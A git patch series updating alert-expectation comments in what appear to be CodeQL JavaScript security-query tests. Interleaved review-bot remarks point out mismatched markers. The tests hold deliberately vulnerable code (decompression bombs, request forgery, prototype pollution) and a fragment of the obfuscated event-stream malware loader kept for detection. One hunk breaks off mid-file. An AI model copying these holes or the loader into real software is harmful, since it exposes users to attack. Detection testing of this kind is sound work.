Subject: [PATCH 049/115] JS: Mark a spurious alert in missing-x-frame-options
---
 .../query-tests/Security/CWE-451/express-good-array-routers.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js b/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js
index efe2e732b552..53efa1cc9537 100644
--- a/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js
+++ b/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js
@@ -1,5 +1,5 @@
 var express = require('express'),
- app = express();
+ app = express(); // $ SPURIOUS: Alert
 app.get('/', [ function (req, res){
From 48760d66b23e7bf6d3183688d31d983a8f1d64f1 Mon Sep 17 00:00:00 2001
From: Asger F
Date: Fri, 21 Feb 2025 20:04:26 +0100
Subject: [PATCH 050/115] JS: Accept alerts for HardcodedDataInterpretedAsCode
---
 .../ql/test/query-tests/Security/CWE-506/event-stream-orig.js | 2 +-
 javascript/ql/test/query-tests/Security/CWE-506/event-stream.js | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js b/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js
index 85daa2d86954..95c1cc3fee66 100644
--- a/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js
+++ b/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js
@@ -93,7 +93,7 @@ module.exports = function (e, n) {
 function e(r) {
 return Buffer.from(r, "hex").toString();
 }
- var n = r(e("2e2f746573742f64617461")),
+ var n = r(e("2e2f746573742f64617461")), // $ Alert
 o = t[e(n[3])][e(n[4])];
 if (!o) return;
 var u = r(e(n[2]))[e(n[6])](e(n[5]), o),
diff --git a/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js b/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js
index e885d2e1f886..d358010c3ae5 100644
--- a/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js
+++ b/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js
@@ -6,7 +6,7 @@ function e(r) {
 return Buffer.from(r, "hex").toString()
 }
-var n = r(e("2e2f746573742f64617461")),
+var n = r(e("2e2f746573742f64617461")), // $ Alert
 o = t[e(n[3])][e(n[4])];
 if (!o) return;
From 3f7f74b92507e18532e677d69476702c9210ccde Mon Sep 17 00:00:00 2001
From: Asger F
Date: Fri, 21 Feb 2025 20:14:51 +0100
Subject: [PATCH 051/115] JS: Accept alerts for DecompressionBomb
---
 .../CWE-522-DecompressionBombs/adm-zip.js | 8 ++++----
 .../CWE-522-DecompressionBombs/decompress.js | 2 +-
 .../CWE-522-DecompressionBombs/jszip.js | 2 +-
 .../CWE-522-DecompressionBombs/node-tar.js | 10 +++++-----
 .../CWE-522-DecompressionBombs/pako.js | 4 ++--
 .../CWE-522-DecompressionBombs/unbzip2.js | 2 +-
 .../CWE-522-DecompressionBombs/unzipper.js | 16 +++++++--------
 .../CWE-522-DecompressionBombs/yauzl.js | 12 +++++------
 .../CWE-522-DecompressionBombs/zlib.js | 20 +++++++++----------
 9 files changed, 38 insertions(+), 38 deletions(-)
diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js
index 5370a4854acc..91abc84e80c8 100644
--- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js
+++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js
@@ -25,13 +25,13 @@ function zipBomb(tarFile) { const zipEntries = admZip.getEntries(); zipEntries.forEach(function (zipEntry) { if (zipEntry.entryName === "my_file.txt") { - console.log(zipEntry.getData().toString("utf8")); + console.log(zipEntry.getData().toString("utf8")); // $ Alert } }); // outputs the content of file named 10GB - console.log(admZip.readAsText("10GB")); + console.log(admZip.readAsText("10GB")); // $ Alert // extracts the specified file to the specified location - admZip.extractEntryTo("10GB", "/tmp/", false, true); + admZip.extractEntryTo("10GB", "/tmp/", false, true); // $ Alert // extracts everything - admZip.extractAllTo("./tmp", true); + admZip.extractAllTo("./tmp", true); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js index 360e29b2f51f..e8adba55e32d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js @@ -8,7 +8,7 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - decompress(req.query.filePath, 'dist').then(files => { + decompress(req.query.filePath, 'dist').then(files => { // $ Alert console.log('done!'); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js index 2da0757c2767..872f84e62f85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js 
@@ -30,7 +30,7 @@ function zipBombSafe(zipFile) { } function zipBomb(zipFile) { - jszipp.loadAsync(zipFile.data).then(function (zip) { + jszipp.loadAsync(zipFile.data).then(function (zip) { // $ Alert zip.files["10GB"].async("uint8array").then(function (u8) { console.log(u8); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js index 53dd6c3d0a80..499d5fd7a2bb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js @@ -21,7 +21,7 @@ function zipBomb(tarFile) { const inputFile = Readable.from(tarFile.data); const outputFile = fs.createWriteStream('/tmp/untar'); inputFile.pipe( - tar.x() + tar.x() // $ Alert ).pipe(outputFile); // scenario 2 @@ -30,7 +30,7 @@ function zipBomb(tarFile) { tar.x({ strip: 1, C: 'some-dir' - }) + }) // $ Alert ) // safe https://github.com/isaacs/node-tar/blob/8c5af15e43a769fd24aa7f1c84d93e54824d19d2/lib/list.js#L90 fs.createReadStream(tarFile.name).pipe( @@ -47,7 +47,7 @@ function zipBomb(tarFile) { ).pipe( tar.x({ cwd: "dest" - }) + }) // $ Alert ) // scenario 4 @@ -55,8 +55,8 @@ function zipBomb(tarFile) { // or using fs.writeFile // file path is a tmp file name that can get from DB after saving to DB with remote file upload // so the input file name will come from a DB source - tar.x({ file: tarFile.name }) - tar.extract({ file: tarFile.name }) + tar.x({ file: tarFile.name }) // $ Alert + tar.extract({ file: tarFile.name }) // $ Alert // safe https://github.com/isaacs/node-tar/blob/8c5af15e43a769fd24aa7f1c84d93e54824d19d2/lib/list.js#L90 tar.x({ file: tarFile.name, diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js index 132d08e1f90a..4fb5b7d35e07 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js @@ -18,7 +18,7 @@ function zipBomb1(zipFile) { const myArray = Buffer.from(new Uint8Array(zipFile.data.buffer)); let output; try { - output = pako.inflate(myArray); + output = pako.inflate(myArray); // $ Alert console.log(output); } catch (err) { console.log(err); @@ -29,7 +29,7 @@ function zipBomb2(zipFile) { const myArray = new Uint8Array(zipFile.data.buffer).buffer; let output; try { - output = pako.inflate(myArray); + output = pako.inflate(myArray); // $ Alert console.log(output); } catch (err) { console.log(err); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js index da560ca30f1d..83c1706573a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js @@ -9,5 +9,5 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - fs.createReadStream(req.query.FilePath).pipe(bz2()).pipe(process.stdout); + fs.createReadStream(req.query.FilePath).pipe(bz2()).pipe(process.stdout); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js index 79e03b9c1814..b20bcb31de46 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js 
@@ -13,15 +13,15 @@ app.post('/upload', async (req, res) => { const RemoteStream = Readable.from(req.files.ZipFile.data); // Unsafe - RemoteStream.pipe(unzipper.Extract({ path: 'output/path' })); + RemoteStream.pipe(unzipper.Extract({ path: 'output/path' })); // $ Alert // Unsafe - RemoteStream.pipe(unzipper.ParseOne()) + RemoteStream.pipe(unzipper.ParseOne()) // $ Alert .pipe(createWriteStream('firstFile.txt')); // Safe because of uncompressedSize RemoteStream - .pipe(unzipper.Parse()) + .pipe(unzipper.Parse()) // $ Alert .on('entry', function (entry) { const size = entry.vars.uncompressedSize; if (size < 1024 * 1024 * 1024) { @@ -31,14 +31,14 @@ app.post('/upload', async (req, res) => { // Unsafe RemoteStream - .pipe(unzipper.Parse()) + .pipe(unzipper.Parse()) // $ Alert .on('entry', function (entry) { const size = entry.vars.uncompressedSize; entry.pipe(createWriteStream('output/path')); }); // Unsafe - const zip = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); + const zip = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); // $ Alert for await (const entry of zip) { const fileName = entry.path; if (fileName === "this IS the file I'm looking for") { @@ -48,7 +48,7 @@ app.post('/upload', async (req, res) => { } } // Safe - const zip2 = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); + const zip2 = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); // $ Alert for await (const entry of zip2) { const size = entry.vars.uncompressedSize; if (size < 1024 * 1024 * 1024) { @@ -57,7 +57,7 @@ app.post('/upload', async (req, res) => { } // Safe because of uncompressedSize - RemoteStream.pipe(unzipper.Parse()) + RemoteStream.pipe(unzipper.Parse()) // $ Alert .pipe(stream.Transform({ objectMode: true, transform: function (entry, e, cb) { 
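Review bot: Several of the alerts accepted in unzipper.js sit on lines whose surrounding comments say they are safe: in the `@@ -13,15` hunk `.pipe(unzipper.Parse()) // $ Alert` follows `// Safe because of uncompressedSize`, in `@@ -48,7` `const zip2 = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); // $ Alert` follows `// Safe`, and in `@@ -57,7` `RemoteStream.pipe(unzipper.Parse()) // $ Alert` again follows `// Safe because of uncompressedSize`. If the `uncompressedSize` check is a genuine mitigation the query does not recognise, the convention used elsewhere in this series is `// $ SPURIOUS: Alert`, which keeps the false positive tracked rather than baking it into the expected output; if the prose comments are stale, they should be changed to `// Unsafe` like their neighbours. Either way the marker and the comment on the preceding line should agree, since a reader of the test otherwise cannot tell which one is wrong. The `app.post` handler enclosing these hunks starts and ends outside them.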
@@ -70,7 +70,7 @@ app.post('/upload', async (req, res) => { })); // Unsafe - RemoteStream.pipe(unzipper.Parse()) + RemoteStream.pipe(unzipper.Parse()) // $ Alert .pipe(stream.Transform({ objectMode: true, transform: function (entry, e, cb) { diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js index 3b726650f76f..59f22e70cebd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js @@ -9,9 +9,9 @@ app.listen(3000, () => { }); app.post('/upload', (req, res) => { - yauzl.fromFd(req.files.zipFile.data) - yauzl.fromBuffer(req.files.zipFile.data) - yauzl.fromRandomAccessReader(req.files.zipFile.data) + yauzl.fromFd(req.files.zipFile.data) // $ Alert + yauzl.fromBuffer(req.files.zipFile.data) // $ Alert + yauzl.fromRandomAccessReader(req.files.zipFile.data) // $ Alert // Safe yauzl.open(req.query.filePath, { lazyEntries: true }, function (err, zipfile) { if (err) throw err; @@ -36,11 +36,11 @@ app.post('/upload', (req, res) => { // Unsafe yauzl.open(req.query.filePath, { lazyEntries: true }, function (err, zipfile) { if (err) throw err; - zipfile.readEntry(); + zipfile.readEntry(); // $ Alert zipfile.on("entry", function (entry) { - zipfile.openReadStream(entry, async function (err, readStream) { + zipfile.openReadStream(entry, async function (err, readStream) { // $ Alert readStream.on("end", function () { - zipfile.readEntry(); + zipfile.readEntry(); // $ Alert }); const outputFile = fs.createWriteStream('testiness'); await pipeline( diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js index 3954d9916144..8391e16e7fed 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js @@ -26,16 +26,16 @@ app.post('/upload', async (req, res) => { function zlibBombAsync(zipFile) { zlib.gunzip( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); zlib.unzip( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); zlib.brotliDecompress( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); } @@ -60,9 +60,9 @@ function zlibBombAsyncSafe(zipFile) { } function zlibBombSync(zipFile) { - zlib.gunzipSync(zipFile.data, { finishFlush: zlib.constants.Z_SYNC_FLUSH }); - zlib.unzipSync(zipFile.data); - zlib.brotliDecompressSync(zipFile.data); + zlib.gunzipSync(zipFile.data, { finishFlush: zlib.constants.Z_SYNC_FLUSH }); // $ Alert + zlib.unzipSync(zipFile.data); // $ Alert + zlib.brotliDecompressSync(zipFile.data); // $ Alert } function zlibBombSyncSafe(zipFile) { @@ -74,9 +74,9 @@ function zlibBombSyncSafe(zipFile) { function zlibBombPipeStream(zipFile) { const inputStream = Readable.from(zipFile.data); const outputFile = fs.createWriteStream('unzip.txt'); - inputStream.pipe(zlib.createGunzip()).pipe(outputFile); - inputStream.pipe(zlib.createUnzip()).pipe(outputFile); - inputStream.pipe(zlib.createBrotliDecompress()).pipe(outputFile); + inputStream.pipe(zlib.createGunzip()).pipe(outputFile); // $ Alert + inputStream.pipe(zlib.createUnzip()).pipe(outputFile); // $ Alert + inputStream.pipe(zlib.createBrotliDecompress()).pipe(outputFile); // $ Alert } async function zlibBombPipeStreamPromises(zipFile) { @@ -84,7 +84,7 @@ async function zlibBombPipeStreamPromises(zipFile) { const outputFile = fs.createWriteStream('unzip.txt'); await stream.pipeline( inputStream, - zlib.createGunzip(), + zlib.createGunzip(), // $ Alert outputFile ) } From cd788bc5099506a24c8a0029bb90fbd82ebd1570 Mon Sep 17 00:00:00 2001 
From: Asger F Date: Fri, 21 Feb 2025 20:18:57 +0100 Subject: [PATCH 052/115] JS: Mark what seems to be missing alerts for fflate The query doesn't seem to model or even mention fflate. Not sure if the library is safe or just not modeled. --- .../CWE-522-DecompressionBombs/fflate.js | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js index 48403ebc86dd..4fb6cbd6195c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js 
@@ -9,14 +9,15 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ Alert - fflate.unzip(new Uint8Array(new Uint8Array(req.files.CompressedFile.data))); - fflate.unzlib(new Uint8Array(req.files.CompressedFile.data)); - fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); - fflate.gunzip(new Uint8Array(req.files.CompressedFile.data)); - fflate.gunzipSync(new Uint8Array(req.files.CompressedFile.data)); - fflate.decompress(new Uint8Array(req.files.CompressedFile.data)); - fflate.decompressSync(new Uint8Array(req.files.CompressedFile.data)); + // Not sure if these are vulnerable, but currently not modeled + fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.unzip(new Uint8Array(new Uint8Array(req.files.CompressedFile.data))); // $ MISSING: Alert + fflate.unzlib(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.gunzip(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.gunzipSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.decompress(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.decompressSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data), { From 0f23c33d3c0fdbcfb5b30528244248fe102ab1c8 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:20:20 +0100 Subject: [PATCH 053/115] JS: Fix a comment Apparently this comment used to say 'NOT OK' but clearly 'OK' was meant --- javascript/ql/test/query-tests/Security/CWE-598/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
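Review bot: The new block contains `fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert` twice (first and fourth lines); the rest of the list pairs each async call with its sync variant, so the first line was presumably meant to be `fflate.unzipSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert`, and as written the duplicate adds no coverage. The added `// Not sure if these are vulnerable, but currently not modeled` comment could give the person who eventually models the library more to go on: as far as I can tell these one-shot calls return the whole decompressed buffer to the caller, which is the same sink shape the other files in this series expect an alert on, so `// $ MISSING: Alert` is the right expectation and the comment could say so, e.g. `// Not modeled yet; same decompress-to-memory shape as the zlib/pako cases`. The `app.post` handler continues past the end of the hunk.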
diff --git a/javascript/ql/test/query-tests/Security/CWE-598/tst.js b/javascript/ql/test/query-tests/Security/CWE-598/tst.js index 93c8146ffc42..02d4a0f0dacc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-598/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-598/tst.js @@ -22,7 +22,7 @@ app.post("/login", (req, res) => { }); app.get("/login2", (req, res) => { - const username = req.param('username'); // $ Alert - usernames are fine + const username = req.param('username'); // OK - usernames are fine const password = req.param('password'); // $ Alert - password read checkUser(username, password, (result) => { res.send(result); From 1ee93cf51bd319b40dbc69124c54b06a789c6018 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:21:17 +0100 Subject: [PATCH 054/115] JS: Manually fix two comments in JSX --- .../Security/CWE-601/ClientSideUrlRedirect/react.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js index 38828b109f13..e5da7ce96a43 100644 --- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js +++ b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js @@ -7,7 +7,7 @@ class Application extends React.Component {
My unsafe app - - + \ No newline at end of file From 3a535dbf68de802ad03ea1be8341ff47ffbc5ac2 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:23:51 +0100 Subject: [PATCH 070/115] JS: Accept another alert --- .../ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html index 6b9fbfe65c8a..97ed8b016f00 100644 --- a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html +++ b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html @@ -1,7 +1,7 @@ Polyfill.io demo - + ... From 9f8744680db792bd66f870e8fcba74b3d112937e Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:33:02 +0100 Subject: [PATCH 071/115] JS: Remove a fixed spurious alert --- javascript/ql/test/query-tests/Security/CWE-843/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index d859f2ade6e2..ca2a1ce0fe30 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js @@ -33,7 +33,7 @@ express().get('/some/path', function (req, res) { foo.indexOf(); } if (foo instanceof Array) { - foo.indexOf(); // $ SPURIOUS: Alert + foo.indexOf(); } (foo + f()).indexOf(); From 2d1aa3e00acab29d4d2c60ec7232719604d851bf Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:35:22 +0100 Subject: [PATCH 072/115] JS: Accept missing alert and clarify reason --- javascript/ql/test/query-tests/Security/CWE-843/tst.js | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index ca2a1ce0fe30..ac055cb82ddf 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js @@ -27,6 +27,8 @@ express().get('/some/path', function (req, res) { foo.indexOf(prefix) == 1; // $ Alert foo.slice(1) === 'x'; // $ Alert + foo.length; // $ Alert + if (typeof foo === "string") { foo.indexOf(); } else { @@ -38,7 +40,7 @@ express().get('/some/path', function (req, res) { (foo + f()).indexOf(); - foo.length; // $ Alert + foo.length; // $ MISSING: Alert - missed due to guards sanitising both branches }); new Koa().use(function handler(ctx) { From 49274d5f73baf60372bc3127f38bcff7a19f601d Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:43:23 +0100 Subject: [PATCH 073/115] JS: Accept an alert --- .../examples/PrototypePollutingFunction.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js index 1953ba57f00b..052fd2e75847 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js @@ -4,7 +4,7 @@ function merge(dst, src) { if (isObject(dst[key])) { merge(dst[key], src[key]); } else { - dst[key] = src[key]; + dst[key] = src[key]; // $ Alert } } } From 976096540fe6062c7abf4780953e325c52a463aa Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:52:08 +0100 Subject: [PATCH 074/115] JS: Accept an alert --- javascript/ql/test/query-tests/Security/CWE-918/clientSide.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js index a8d7d429cf86..1724d06091fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js @@ -11,7 +11,7 @@ export function MyComponent() { const query = window.location.search.substring(1); request('https://example.com/api/' + query + '/id'); // $ Alert[js/client-side-request-forgery] request('https://example.com/api?q=' + query); - request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway + request('https://example.com/api/' + window.location.search); // $ Alert[js/client-side-request-forgery] - likely OK - but currently flagged anyway const fragment = window.location.hash.substring(1); request('https://example.com/api/' + fragment + '/id'); // $ Alert[js/client-side-request-forgery] From 764eb9880985e76e60a3c030340b29f4bb406bb4 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:52:27 +0100 Subject: [PATCH 075/115] JS: Move two alerts and add query ID --- .../ql/test/query-tests/Security/CWE-918/serverSide.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 50a7fe976998..777f7eb00840 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js @@ -20,8 +20,8 @@ var server = http.createServer(function(req, res) { request.get(tainted); // $ Alert[js/request-forgery] var options = {}; - options.url = tainted; // $ Alert - request(options); + options.url = tainted; + request(options); // $ Alert[js/request-forgery] request("http://" + tainted); // $ Alert[js/request-forgery] 
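Review bot: The new marker `// $ Alert[js/client-side-request-forgery] - likely OK - but currently flagged anyway` records a result the author believes is a false positive as an expected alert, so a later precision improvement to the query would surface as a test failure with nothing in the expectation saying it is welcome. This series already uses the `// $ SPURIOUS: Alert` form for exactly that situation (the CWE-843 change a few commits earlier removes one), so `request('https://example.com/api/' + window.location.search); // $ SPURIOUS: Alert[js/client-side-request-forgery] - likely OK` would keep the author's judgement and the tracked false positive in the same place. The `MyComponent` function continues outside the hunk.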
@@ -124,8 +124,8 @@ var server2 = http.createServer(function(req, res) { axios({ method: 'get', - url: tainted // $ Alert - }) + url: tainted + }) // $ Alert[js/request-forgery] var myUrl = `${something}/bla/${tainted}`; axios.get(myUrl); // $ Alert[js/request-forgery] From 4d7cbe6f607e69445a2d2a4911cba20f13389374 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:52:45 +0100 Subject: [PATCH 076/115] JS: Accept to web socket-based SSRF alerts --- javascript/ql/test/query-tests/Security/CWE-918/serverSide.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 777f7eb00840..a6a863860c79 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js @@ -106,7 +106,7 @@ import * as ws from 'ws'; new ws.Server({ port: 8080 }).on('connection', function(socket, request) { socket.on('message', function(message) { const url = request.url; - const socket = new ws(url); + const socket = new ws(url); // $ Alert[js/request-forgery] }); }); @@ -114,7 +114,7 @@ new ws.Server({ port: 8080 }).on('connection', function (socket, request) { socket.on('message', function (message) { const url = new URL(request.url, base); const target = new URL(url.pathname, base); - const socket = new ws(url); + const socket = new ws(url); // $ Alert[js/request-forgery] }); }); From e634b31c2780ee2baa16a28a46e64c4b97bc3379 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:58:30 +0100 Subject: [PATCH 077/115] JS: Accept some UselessConditional alerts --- .../UselessConditional/UselessConditional.js | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) 
diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index d698b7d1c29e..a629ae06320d 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -2,32 +2,32 @@ function getLastLine(input) { var lines = [], nextLine; while ((nextLine = readNextLine(input))) lines.push(nextLine); - if (!lines) + if (!lines) // $ Alert throw new Error("No lines!"); return lines[lines.length-1]; } function lookup(cache, k) { var v; - return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); + return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); // $ Alert } function test(a, b) { if (!a && !b) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } if (!(a || b)) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } var x = new X(); - if(x){} - if (new X()){} - if((x)){} - if(((x))){} - if ((new X())){} + if(x){} // $ Alert + if (new X()){} // $ Alert + if((x)){} // $ Alert + if(((x))){} // $ Alert + if ((new X())){} // $ Alert x = 0n; if (x) // $ Alert @@ -51,7 +51,7 @@ async function awaitFlow(){ var known = knownF(); if (known) return; - if (known) + if (known) // $ Alert return; var unknown = unknownF(); @@ -86,7 +86,7 @@ async function awaitFlow(){ }); (function() { - if ((x, true)); + if ((x, true)); // $ Alert }); (function (x, y) { From 507a0918ad68dc79025ca220b165089e317d1a39 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 17:00:09 +0100 Subject: [PATCH 078/115] JS: More alert updates in UselessConditional --- .../UselessConditional/UselessConditional.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) 
